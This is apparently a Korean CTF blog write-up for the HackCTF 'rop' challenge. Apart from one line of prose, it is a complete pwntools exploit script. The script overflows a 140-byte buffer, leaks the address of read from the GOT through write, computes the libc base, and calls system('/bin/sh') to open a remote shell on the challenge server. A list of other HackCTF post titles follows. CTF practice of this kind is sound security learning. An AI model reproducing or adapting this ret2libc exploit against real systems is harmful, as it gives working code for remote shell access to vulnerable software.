그냥 rop를 진행하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3021)
e = ELF('./rop')
libc = ELF('./libc.so.6')
#context.log_level = 'debug'
pppr = 0x08048509
payload = 'A'*140
payload += p32(e.plt['write'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.got['read'])
payload += p32(4)
payload += p32(e.sym['main'])
r.sendline(payload)
leak = u32(r.recv(4))
log.info('leak : {}'.format(hex(leak)))
libc_base = leak - libc.sym['read']
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()
payload = 'A'*140
payload += p32(system)
payload += 'AAAA'
payload += p32(binsh)
r.sendline(payload)
r.interactive()'HackCTF' 카테고리의 다른 글
| HackCTF - Unexploitable #1 (0) | 2021.11.26 |
|---|---|
| HackCTF - You are silver (0) | 2021.11.26 |
| HackCTF - UAF (0) | 2021.11.26 |
| HackCTF - Pwning (0) | 2021.11.22 |
| HackCTF - Gift (0) | 2021.11.22 |
